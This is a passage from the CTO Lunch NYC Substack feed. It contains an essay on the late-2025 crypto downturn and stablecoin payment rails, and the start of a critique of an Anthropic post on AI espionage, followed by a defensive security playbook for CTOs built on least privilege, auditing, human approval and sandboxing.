month&#8217;s CTO Lunch is Thursday, December 11. Sign up for location.<br>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p></div><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe for free to receive monthly updates from CTO Lunch NYC.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item><item><title><![CDATA[Web3 Wonderland]]></title><description><![CDATA[What November's collapse revealed about liquidity, and the cold]]></description><link>https://ctolunchnyc.substack.com/p/web3-wonderland</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/web3-wonderland</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Fri, 05 Dec 2025 13:03:25 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f4674226-2437-4a4a-a057-82d5b69250d8_1024x650.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>The frost set in fast.</strong> <em>Here in NYC we had one of the earliest frosts in the last 25 years</em> <br>(not counting 2013 &amp; 2020 when it hit in September), which almost seems like a harbinger in hindsight. November looked like classic macro spillover: stocks up, bonds flat, VIX spiked 11%, climbing past 27. S&amp;P 500&#8217;s P/E ratio didn&#8217;t budge (all year.) Treasury yields held. Equities traded sideways. Then, there was Bitcoin, which dropped $40,000 in 45 days.&#127906; From $126,000 to $89,000, a trillion dollars evaporated seemingly overnight across crypto markets; some instruments lost more than 80% of their nominal value. But look closer, the collapse was surgical, isolated to the speculative frontier: crypto and AI infrastructure, twin pillars of &#8220;future tech&#8221; both suddenly repriced as if someone had turned off the heat.  But who? </p><div class="pullquote"><p>We talk about crypto &#8220;cycles&#8221; but in our rush to TA seem to ignore <em><strong>seasonality</strong></em>. A very expensive mistake for some as the market wiped out a trillion dollars almost overnight. </p></div><p>In November alone, major holders transferred over 63,000 BTC out of long-term storage, signaling profit-taking and sparking widespread selling. This is approximately $5.4 billion in Bitcoin moving at current prices. The pattern has been repeating all month: large holders de-risking while retail tried to buy the dip.</p><p>ETF flows tell the story. After $61 billion in cumulative inflows through Q2 2025, institutional money reversed. After Uptober&#8217;s wild rocket ride, Downvember saw multi-billion-dollar outflows. Retail enthusiasm remained, albeit jittery, but institutional appetite vanished. The $1 trillion drawdown accomplished two things simultaneously: (a) destroyed paper wealth for speculators, and (b) forced sorting of who actually has cash flow, governance, and real problems to solve. </p><p>To understand why this drawdown was so severe, we need to zoom in on how AI and crypto have become structurally coupled. But first, let&#8217;s be clear about terminology.</p><h2>The Bear In Winter </h2><p>Everyone wants to name what&#8217;s happening. Bear market. Crypto winter. Macro spillover. AI leverage unwind. But labels are shortcuts that shackle diagnosis, and what&#8217;s happening now doesn&#8217;t map cleanly to any previous cycle. (Rhyming, not repeating, as we say.) The market behavior is hybrid, caught between psychological collapse and structural failure, exhibiting characteristics of both without fully committing to either. Here, the distinction between a bear market and a crypto winter proves to be both critical and instructive. </p><p><strong>A bear market is psychological.</strong> Prices fall because participants stop believing in tomorrow&#8217;s bid. Sentiment compounds into fear until no one wants to catch the falling knife. It&#8217;s a crisis of confidence that can reverse the moment conviction returns. Bears are reversible. </p><p><strong>A crypto winter is structural.</strong> Something deeper broke: liquidity plumbing, exchange solvency, capital flow assumptions, risk distribution mechanisms. These aren&#8217;t sentiment problems. They&#8217;re architectural failures that require rebuilding, not just renewed optimism. Winters don&#8217;t care about your conviction. They care whether your infrastructure can operate without an external heat source.</p><p>What we&#8217;re experiencing now is rarer and more dangerous: a cyclical downturn colliding with a leverage regime the industry insisted didn&#8217;t exist. It&#8217;s <strong>the bear in winter</strong>: prices are behaving like a bear market; liquidations are behaving like a winter. While builders are behaving like it&#8217;s still late-cycle euphoria, telling themselves the warmth is coming back any day. Builders gonna build. </p><h2>Coupled Risk: AI on the Blockchain</h2><h5>The long tail of the Great Capital Reallocation <br>&#8203;&#8204;&#8205;&#65279;&#8288;&#8291;&#8290;&#8292;&#8201;&#8202;</h5><p>The cause isn&#8217;t mysterious. Two narratives inflated each other without ever integrating their risk: artificial intelligence and crypto-native finance. Both promised to reshape the global economy. Both attracted the same capital pools hunting frontier returns. Both treated regulatory uncertainty as SEP (someone else&#8217;s problem.) And when questions emerged about AI&#8217;s unit economics (that $400 billion capex chasing non-existent app revenue from <a href="/__u/ctolunchnyc.substack.com/p/turning-sand-into-money">Turning Sand into Money</a>), the contagion was immediate and fairly devastating. </p><p>This is where the <strong>Bear Market</strong> <em>psychology</em> leveraged a <strong>Crypto Winter</strong> <em>structure</em>. The sentiment shifted in the AI sector first, causing AI-related stocks to drop. But an architectural flaw was revealed in the collateral coupling.</p><p>Bitcoin miners had pivoted their infrastructure to AI compute, leveraging power contracts and data center capacity to host NVIDIA GPUs for high-performance computing clients. Their valuations became tied to AI industry growth, which meant crypto sentiment became tied to AI credibility. When skepticism about AI returns surfaced, mining stocks got repriced. Bitcoin followed. Then crypto served as collateral for AI infrastructure spending, creating a feedback loop: AI doubts trigger crypto liquidations, forcing deleveraging in adjacent markets, amplifying AI skepticism. </p><p>The mechanism connecting AI equity to crypto collateral is straightforward, not to mention terrifying if you&#8217;re over-leveraged. Multiple AI startups use Bitcoin as collateral for credit facilities. The precise figure: at least $26.8 billion in BTC backing AI-related loans as of December 2025. This creates a Medusa cascade sequence: major AI stock drops 40%, lenders issue margin calls on Bitcoin-collateralized loans, AI startups forced to post additional collateral or liquidate BTC positions, $23+ billion in Bitcoin hits the market, Bitcoin crashes below $52,000, crypto credit markets freeze as collateral values evaporate, derivatives unwind, leveraged positions liquidate, connected balance sheets collapse.</p><p>This isn&#8217;t theoretical but empirical. Over $19 billion was liquidated in October&#8217;s flash crash alone. Recent 24-hour liquidation events have topped $800 million to $2 billion, with 90%+ being long positions. Order books remain thin post-October, market makers spooked, liquidity absent. Even modest selling pressure creates 5-10% gaps on low volume. The <strong>Bear</strong> (price drop) accelerated because the <strong>Winter</strong> mechanism (leverage, structural coupling) turned confidence problems into solvency problems.</p><h2>Two Cultures: Pipes vs. Mirrors </h2><h5>And what happens to each when liquidity freezes<br>&#8203;&#8204;&#8205;&#65279;&#8288;&#8291;&#8290;&#8292;&#8201;&#8202;</h5><p>The real crack in the ice is between two fundamentally different types of capital aspiring to the same throne: digital financial capital and digital social capital.  This isn&#8217;t simply <strong>attention vs utility</strong>; that undersells the distinction. They intersect. They both produce tokens, obvi. They both claim to represent value. But as those who have been playing this game for a while understand, they do not behave the same when liquidity goes to ground.</p><p>Digital financial capital operates like plumbing. It prices liquidity, certainty, and enforceability. Value is realized through spreads, throughput, counterparty reliability, settlement guarantees. It competes against banking rails, treasury desks, and payments infrastructure. You can test it with size. You can measure it with SLAs. You can sue the counterparty when something breaks. This is capital in the oldest sense: deployable, fungible, and subject to external validation. <em>It is designed to survive winter.</em></p><p>Digital social capital operates like <a href="https://www.bopsecrets.org/SI/debord/notes.htm">spectacle</a>. It prices attention, coordination, and narrative momentum. Value comes from cultural legitimacy and the velocity of collective belief. It competes against TikTok, fandoms, and creator economies. Its liquidity is reflexive and theatrical, existing only when watched. It&#8217;s Heisenmoney; you cannot test it with size without destroying it. You cannot measure it with SLAs because the agreement is vibes. You cannot sue the counterparty because the counterparty is a Discord server and reaction emojis. This is capital only in the sociological sense: reputation that can be temporarily financialized. <em>It cannot survive winter; it requires constant heat.</em></p><p>The frost separated them with brutal efficiency. Financial capital has real orderbooks you can stress-test. Social capital has &#8220;infinite liquidity&#8221; until someone tries to trade size, at which point thin books masquerading as depth collapse instantly. Dust to dust. Financial capital settles with proofs, auditors, and legal recourse. Social capital settles with narrative finality: shifting influencer endorsements, meme half-lives and collapsing new liquidity. Financial capital yields fees because it provides a service people will pay for repeatedly. Social capital burns capital to sustain attention, requiring constant narrative oxygen just to remain visible. Dopamine as currency. </p><p>The lesson isn&#8217;t that social capital has no value. It does. Attention, coordination, and narrative cohesion are real economic forces. The lesson is that social capital and financial capital require different infrastructure, different risk management, and different expectations about what happens under stress. Conflating them, treating community promises as equivalent to audited reserves, mistaking virality for liquidity, creates exactly the kind of brittle architecture that shatters when temperature drops. Bear Markets test sentiment (the desire to hold). Crypto Winter reveals which architecture could hold the value when the sentiment failed.</p><p>This distinction becomes concrete when we look at which systems actually kept moving: attention-coins glitched out; stablecoin rails popped off. </p><h2>Attention on Rails</h2><h5>Disagreement is what we have in common<br><br></h5><p>Think of it this way: attention-coins behave like unstable social derivatives; payments infrastructure behaves like plumbing. Attention-coins try to monetize coordination, but their liquidity is reflexive, it exists only when watched. Payments infrastructure earns durable fees because it moves real money tied to real obligations. <em>One is a sentiment amplifier; the other is a settlement substrate.</em></p><p>The fundamental &#8216;problem&#8217; with digital social capital is that <strong>disagreement</strong> (and not contradiction, as Deleuze would ofc point out) <strong>is attention&#8217;s atomic primitive</strong>. Kalshi&#8217;s Luana Lara, now the youngest self-made female billionaire, candidly <a href="https://x.com/MorePerfectUS/status/1996300723483443244">acknowledges</a> that disagreement (<em>about literally anything that can be disagreed on</em>) is the fundamental primitive of prediction markets. Controversy generates engagement. Conflict creates narrative momentum. A token can pump on community drama just as easily as it can pump on utility. However, if your treasury model cannot distinguish between realized spread and Twitter virality, between reserve quality and Discord screenshots, between slippage under stress and community vibes, what you have isn&#8217;t a financial operation  but rather performance art that will evaporate the moment the audience stops watching. Send in the clowns, but unironically.  </p><p>Bitcoin inscriptions, on-chain artifacts, $10k Bitcoin &#129510;socks, all while institutional players measured operational and legal exposure. Ordinals became the definitive test case. During euphoria, Ordinals attracted liquidity and attention, pushing institutional custodians into existential questions: are we custodians of digital property or someone&#8217;s jpeg collection? (Not to mention thornier questions around CSAM.) When first frost  hit, market depth vanished. There was no orderbook providing support. No institutional buyers stepping in with liquidity. Just a community promising that holding was virtuous and selling was betrayal, which turns out to be a poor substitute for a market maker with balance-sheet capacity. The Social Capital narrative failed the structural test of Winter.</p><p>Meanwhile, stablecoin rails on fast L2s kept clearing transactions. This isn&#8217;t a philosophical difference; it&#8217;s mechanical. One system has audited reserves, regulated counterparties, and predictable settlement. The other has vibes. (And &#8220;<a href="https://www.instagram.com/razzlekhan/?hl=en">Razzlekhan</a>&#8221; who got released from prison last month, tho she&#8217;s no doubt is restricted from going anywhere near crypto, let alone launching a coin.) Vibes that have zero impact on infrastructure, unless you count the explosive growth of Polymarket and Kalshi, both of which make their founders into billionaires. Capital loves functioning rails built for the cold. Narratives only buy attention until liquidity runs out.</p><h2>The Fish Below The Ice </h2><p><strong>Stablecoin payments exploded.</strong> USDC on the much-maligned Base (Coinbase&#8217;s Layer 2) became the default settlement layer for practical crypto usage. By mid-2025, Base had 33% of U.S. Layer-2 payment market share, far exceeding Polygon (13.4%) or Optimism (7.1%). USDC accounted for nearly 60% of Arbitrum&#8217;s stablecoin volume. On Base and Optimism, USDC was the default from day one, ETH never had a chance. (Although it&#8217;s still my favourite stablecoin.) </p><p>The data is stark: ETH payments on Arbitrum fell from over 50% in 2023 to just 23% in 2025. Stablecoins took the rest. Payment processors saw this in real-time. CoinGate reported 135% year-over-year growth in Polygon transactions in 2024, with another 16.5% YoY growth in 2025. July 2025 marked Polygon&#8217;s busiest month ever, driven entirely by surging USDC usage.</p><p>Stripe rolled out stablecoin subscription payments in October, letting U.S. businesses accept USDC on Base and Polygon, settled automatically in fiat. The $1.1 billion acquisition of Bridge in October 2024 positioned Stripe to tokenize global payment rails. By December 2025, Bridge filed for a national trust bank charter with the OCC, the infrastructure to &#8220;tokenize trillions of dollars&#8221; if approved.</p><p>Shopify enabled USDC payments on Base <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-july-2025#:~:text=Coinbase%20and%20Shopify%20unveiled%20seamless%20crypto%20checkout%20experiences%2C%20proving%20stablecoins">in June</a>, with 1% cash back for customers. This infrastructure, not meme coins, not $10k socks, represented the actual utility case. Stablecoin payment volumes hit $19.4 billion year-to-date by mid-2025.</p><div class="pullquote"><p>Konrad Urban, a stablecoin payments builder, summarized the opportunity: <br>&#8220;Just a background settlement using whatever balance the client already has.&#8221; <br>Boring. Functional. Scalable.</p></div><p>MicroStrategy&#8217;s transparent treasury made risk visible and marketable. Public, hedged books meant counterparties could price exposure and plan around it. The reporting didn&#8217;t prevent pain, but it made pain fungible. Stablecoin rails like USDC kept clearing transactions with audited reserves and regulated counterparties. Base and similar Layer 2s processed volume with minimal slippage because they had predictable settlement mechanics, not because they had community enthusiasm. Custodians with SLAs and balance-sheet capacity absorbed institutional migration as firms fled to providers who could prove indemnity and survive concentrated runs. Exchanges and OTC desks with real inventory acted as counterparties, absorbed distortions, and earned the spread.</p><h2>That Which Survives</h2><p>The ones who survive every cycle are the ones perfectly comfortable when temperature drops, because they built for winters that don&#8217;t negotiate, that don&#8217;t care about your thesis or your community, that simply reveal whether your architecture was real. And how well you&#8217;ve learned your lessons. </p><p><strong>Liquidity is not optional.</strong> The freeze exposed how much of crypto&#8217;s valuation depended on fast, unconditional liquidity. Without it, mark-to-market becomes mark-to-panic. Treasury architectures that assume perpetual depth get punished.</p><p><strong>Narratives are corrosive when governance is weak.</strong> Spectacle raises reputational and legal costs that reduce institutional participation. Custodians, compliance officers, and courts eventually stop laughing.</p><p><strong>Collateral coupling with AI is the new tail risk.</strong> Crypto is now entangled with AI infrastructure speculation. That entanglement amplifies shocks neither ecosystem can absorb independently. It&#8217;s systemic financing risk.</p><p><strong>Regulatory alignment is priced in.</strong> Legal actions trigger liquidity freezes. Institutional allocators now price regulatory compliance as mandatory, not nice-to-have. Product designers who embedded KYC, audited reserves, and insurance from the beginning see lower counterparty haircuts and access capital that won&#8217;t touch competitors treating compliance as optional.</p><p><strong>Plumbing wins, always.</strong> Stable payment rails, composable settlement primitives, and well-governed tokenization endure. They don&#8217;t glitter; they clear transactions. If you got in early and kept your architecture clean, if you didn&#8217;t mistake noise for signal or motion for progress, if you distinguished between pipes that pull fees and mirrors that push attention, you&#8217;re not scrambling now. Winter isn&#8217;t the same threat when you&#8217;re holding plumbing; it&#8217;s a competitive advantage.</p><h2>A Beautiful Sight</h2><p>The freeze exposed structural truths the industry deferred during euphoria. Treasury architectures that assume perpetual depth get punished. Collateral coupling with AI is the new tail risk; crypto entangled with AI infrastructure speculation amplifies shocks neither ecosystem can absorb independently. Regulatory alignment is priced in.</p><p>What comes next depends on who adapts. If the AI-credit overhang clears without cascading liquidations, this stays a <strong>Bear Market</strong> (a sentiment problem). If loan books crack and collateral melts, <strong>Winter</strong> fully settles in (a structural problem).</p><p>When the thaw arrives (and it always does) it won&#8217;t reward the participants who waited for warmth to return. It rewards the builders who treated winter as calibration, who rebuilt architecture instead of waiting for sentiment to recover, who understood that survival requires operating in the cold rather than reminiscing about summer. Most participants arrive in crypto looking for summer. They want easy liquidity, hype cycles, and reflexive pumps. </p><p>Winter tests structure; bear markets test conviction. Those who built resilient plumbing, not fragile mirrors, weather both with advantage. The ones who last are the ones who kept their keys, kept their conviction, kept building infrastructure instead of chasing narratives. Which is why, while everyone else panics or prays for a thaw, you&#8217;re out here beaming, steady, unfrozen. <br><br>Walking in a Web3 wonderland.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!J-F5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 424w, /__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 848w, /__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 1272w, /__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!J-F5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png" width="1024" height="650" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:650,&quot;width&quot;:1024,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1268378,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/180771917?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 424w, /__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 848w, /__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 1272w, /__u/substackcdn.com/image/fetch/$s_!J-F5!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F983322c2-ebca-4e0f-b683-9e06c183b54f_1024x650.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="pullquote"><p><em>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p></div>]]></content:encoded></item><item><title><![CDATA[No Time To Spy ]]></title><description><![CDATA[AI Espionage and What Anthropic Didn&#8217;t Say]]></description><link>https://ctolunchnyc.substack.com/p/no-time-to-spy</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/no-time-to-spy</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Thu, 04 Dec 2025 13:01:13 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/0b9ad7a0-d108-45aa-8976-79699bb9d389_1248x832.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Anthropic published a blog post this month titled</strong> &#8220;Disrupting AI-powered espionage&#8221; that smh manages to be simultaneously alarming and completely uninformative. The central claim: &#8220;advanced AI systems&#8221; with &#8220;agentic capabilities&#8221; create new espionage risks. The proposed solution: refusing certain requests and monitoring for &#8220;misuse patterns.&#8221; Why does this sound like a press release masquerading as a security whitepaper? Oh right, because it is. Let&#8217;s unpack what was said, and what wasn&#8217;t. </p><h3>The Rhetoric Problem</h3><p><strong>Here&#8217;s the trick: invoke &#8220;agentic AI&#8221; as if it&#8217;s qualitatively different</strong> from every program ever written, never define what makes it different, then use that undefined threat to justify vague countermeasures. No shade on Anthropic, I respect the company, but it&#8217;s security theater dressed up in AI clothing, and it&#8217;s spreading.</p><p>The post worries about models that can &#8220;autonomously execute multi-step tasks.&#8221; Congratulations, you&#8217;ve just described every bash script, API orchestration layer, and database transaction in existence. Computers executing multi-step operations isn&#8217;t new. What <strong>is</strong> allegedly new is <em>when an LLM generates those steps</em>. But Anthropic never explains why that difference matters for the threat model. This is a problem. </p><p>Is it adaptability? Every program with conditionals can adjust based on intermediate results. Is it the natural language interface? That lowers the skill floor for attackers, sure, but you still need underlying access and permissions. Is it unpredictability? That&#8217;s a real concern, but then your mitigation should be about sandboxing, capability restrictions, and deterministic guardrails, not &#8220;monitoring for patterns.&#8221;</p><p>If you think the actual risk, after stripping away the AI mysticism, is something like: &#8220;LLMs lower the barrier to entry for stringing together existing exploits in novel sequences, and their stochastic nature makes behavioral prediction harder.&#8221; Fine. Say that. Then explain what technical controls actually address it. Instead we get vague hand-waving about &#8220;advanced capabilities&#8221; as if ChatGPT learned to teleport. </p><div class="pullquote"><p>This is precisely and literally the logic of <strong>Dromology</strong> applied to offense. </p></div><p><strong>The only meaningful angle here is speed of execution.</strong> LLMs can iterate through reconnaissance and exploitation attempts faster than humans typing. Think the stereotypical movie hacker, fingers flying across the keyboard, except it&#8217;s actually happening. This is precisely and literally the logic of <strong>Dromology</strong> applied to offense. As Virilio argued, when a system accelerates beyond a certain threshold, it loses the structural bandwidth to maintain meaning. On the defensive side, Anthropic&#8217;s response of &#8220;monitoring for patterns&#8221; is the classic institutional reaction to acceleration: tightening command rather than improving comprehension.</p><p>But even that&#8217;s not novel. We&#8217;ve had automated exploit frameworks (Metasploit), fuzzing tools (AFL, LibFuzzer), and vulnerability scanners (Nmap, Burp Suite) for literally years (and what other kind are there) if not decades. If the threat is &#8220;LLMs make attack iteration faster,&#8221; the question isn&#8217;t whether they can, it&#8217;s <em>how much</em> faster, and does that speed cross a meaningful defensive threshold? Without quantification, you&#8217;re not doing threat modeling. You&#8217;re writing speculative fiction about AI capabilities. Which doesn&#8217;t really help CTOs allocate security budgets. <br>But hey, CTOs have nothing but extra time on their hands, right? </p><h3>What a Real Threat Model Looks Like</h3><p>Security professionals use threat models. Not vibes. A proper analysis would specify:</p><ul><li><p><strong>Attack Surface</strong>: What&#8217;s the actual vector? Compromised credentials? API access with insufficient scoping? Prompt injection leading to unintended tool use? Model extraction attacks? Each has different mitigations.</p></li><li><p><strong>Prerequisites</strong>: What does an attacker need before &#8220;agentic AI espionage&#8221; becomes viable? If they already have network access and valid credentials, the AI isn&#8217;t the problem, your access controls are. The model is just accelerating reconnaissance they could do manually.</p></li><li><p><strong>Impact Analysis</strong>: What can an AI-assisted attacker exfiltrate that a human with the same access couldn&#8217;t? If the answer is &#8220;nothing, just faster,&#8221; then this is a rate-limiting problem, not an AI problem.</p></li><li><p><strong>Countermeasures &amp; Efficacy</strong>: What&#8217;s the false positive rate on &#8220;misuse pattern&#8221; detection? How do you distinguish espionage from legitimate security research? What happens when adversaries learn your detection signatures and route around them?</p></li></ul><p>Anthropic provides none of this. The post reads like it was written for policymakers who need talking points, not engineers who need to harden infrastructure.</p><h3>What Anthropic Actually Said (And Didn&#8217;t)</h3><p>In the post Anthropic claims they are:</p><ol><li><p>Refusing certain requests (undefined)</p></li><li><p>Monitoring for &#8220;misuse patterns&#8221; (undefined)</p></li><li><p>Collaborating with &#8220;threat intelligence partners&#8221; (unnamed)</p></li></ol><p>What&#8217;s missing:</p><ul><li><p>Concrete capability thresholds that define &#8220;concerning agentic behavior&#8221;</p></li><li><p>Technical specifications of what their monitoring actually detects</p></li><li><p>False positive/negative rates for their detection systems</p></li><li><p>Specific attack patterns they&#8217;ve observed in the wild versus theoretical concerns</p></li><li><p>Architectural details of how their sandboxing prevents capability escalation</p></li><li><p>Metrics on whether their mitigations actually reduce espionage risk</p></li></ul><p>This is particularly frustrating because Anthropic publishes solid technical work elsewhere! Their interpretability papers are rigorous. Their Constitutional AI research has real technical depth. Their culture seems to be on point. This post feels like it was written by their policy team without an engineer in the room, then positioned as substantive security guidance. Security through obscurity much? </p><h2>What This Means for CTOs</h2><h4>The Real Infrastructure Question</h4><p><strong>Strip away the &#8220;agentic&#8221; mysticism and you&#8217;re left with a classic security problem</strong>: how do you safely delegate authority to automated systems that might behave unpredictably?</p><p>That&#8217;s not new. We solved this for web servers (capability-based sandboxing), for cloud functions (IAM policies with least-privilege access), for CI/CD pipelines (isolated execution environments with credential scoping). The solution isn&#8217;t hand-waving about &#8220;monitoring.&#8221; It&#8217;s:</p><p><strong>1. Capability Restriction</strong>: LLMs should only be able to invoke tools you&#8217;ve explicitly granted. If your model can access production databases because &#8220;it needs context,&#8221; your architecture is wrong. Use read-only replicas, synthetic data, or scoped credentials that auto-expire.</p><p><strong>2. Action Auditing</strong>: Every tool invocation should be logged with full context: what was requested, what was executed, what data was accessed. Not for &#8220;misuse pattern detection&#8221; but for forensic reconstruction when something goes wrong.</p><p><strong>3. Human-in-the-Loop for High-Risk Operations</strong>: Certain actions (data exfiltration, credential generation, production writes) should require explicit human approval. Not because AI is scary, but because these are high-impact operations that warrant oversight regardless of who&#8217;s requesting them.</p><p><strong>4. Rate Limiting &amp; Anomaly Detection</strong>: If an API key suddenly makes 10,000 requests in an hour when historical patterns show 50/hour, that&#8217;s worth investigating. This works whether the requests come from an AI agent, a compromised developer workstation, or a malicious insider.</p><p><strong>5. Sandboxing &amp; Isolation</strong>: Run AI-generated code in isolated containers with no network access to production systems. Test outputs in staging before promotion. This is standard DevSecOps translated to agentic workflows.</p><p>None of this requires inventing new security paradigms. It requires applying existing best practices to a new execution layer.</p><h2>CTO Playbook:  (30/60/90)</h2><h4>Hardening Against AI-Assisted Attacks</h4><h5><strong>&#9633; 30 day</strong></h5><ul><li><p><strong>Capability Inventory &amp; Scoping (HIGH PRIORITY - 30 days)</strong></p><ul><li><p><strong>Audit</strong> every service that could be invoked by an LLM (yours or an attacker&#8217;s). <strong>Document</strong>: what data can be accessed, what operations can be performed, what downstream systems can be reached. For each capability, <strong>implement</strong> least-privilege access: read-only where possible, time-limited credentials everywhere, explicit 